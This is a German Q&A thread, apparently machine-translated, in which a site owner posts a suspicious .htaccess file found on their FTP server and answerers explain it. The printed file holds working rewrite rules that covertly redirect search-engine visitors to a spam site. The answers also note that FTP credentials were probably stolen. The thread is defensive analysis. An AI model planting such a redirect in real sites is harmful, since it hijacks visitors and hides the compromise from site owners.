Frage Verdächtige .htaccess-Datei


Dies wurde in einen meiner FTP-Ordner hochgeladen. Ich bin mit Apache nicht vertraut, aber immer noch neugierig - kann mir jemand sagen, welche Art von heimtückischen Akt diese Datei zu begehen versucht? Vielen Dank!

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]

19
2017-11-02 15:48


Ursprung


NETT! (Auf eine böse Art ...) Nimmt im Grunde alle, die von einer Suchmaschine zu Ihrer Seite kommen, auf SPAMMER.info um - KPWINC
Wäre mir das einmal passiert. Das .htaccess Datei, die zu meiner Site hinzugefügt wurde, hatte ungefähr 40 Leerzeilen an der Spitze, nur um mich weiter zu verwirren. - TRiG


Antworten:


Das sendet Benutzer, die von einer Suchmaschine kommen, an die letzte Site SPAMMER.info (siehe Frage Geschichte für tatsächlich Seite? ˅).

Es sucht nach Verweisen, vor denen es sich zu verstecken versucht Sie, da Sie wahrscheinlich nicht über Suchmaschinen auf die Website zugreifen. Das heißt, wenn Sie direkt zur URL gehen, scheint alles normal zu sein. Wenn Sie jedoch über eine Suchmaschine kommen, werden Sie umgeleitet.

Hinweis: dies nicht beeinflussen Web-Crawler wie sie (Googlebot, zumindest) setze den Referrer Header nicht.


15
2017-11-02 15:51





Jedes Mal, wenn ein Nutzer von einer Suchmaschine eine Seite Ihrer Website aufruft, werden diese auf die .info-Spam-Website weitergeleitet.

Es ist sehr hinterhältig - Sie werden nicht bemerken, dass etwas falsch ist, da Sie normalerweise nur die Adresse eingeben.


8
2017-11-02 15:49



Da es sich auf den Referrer bezieht, wird es nicht alle Klicks umleiten, die durch eine Suchmaschine kommen?
Beeinflusst das nicht auch Links von Google? ZB suchen Sie nach der Website des OP bei Google, klicken Sie darauf und Sie werden weitergeleitet, da Sie von Google kommen?
Ja, Links nur von Suchmaschinen (wie ich in meiner Antwort gesagt habe) aber nicht Suchmaschinen Crawler / Bots. Diese Antwort wurde aktualisiert, sodass sie jetzt korrekt ist. Es gab ursprünglich an, dass dies nur für Bots galt. - Michael Haren


um mehr hinzuzufügen - höchstwahrscheinlich sind Ihre FTP-Zugangsdaten verloren gegangen. vielleicht hattest du sie in filezilla / total commander usw. gespeichert. es gibt jede menge von Malware, die diese stiehlt und dann 'herumgeht' - sich auf ftp-accounts anmeldet, javascript an index.php / html anfügt oder ähnliche rewrite-dateien setzt.


1
2017-11-03 23:13



Ich stehe vor diesem Problem. Tag nach der anderen .htaccess-Datei wird geändert, was zu einem internen Serverfehler führt. - vnix27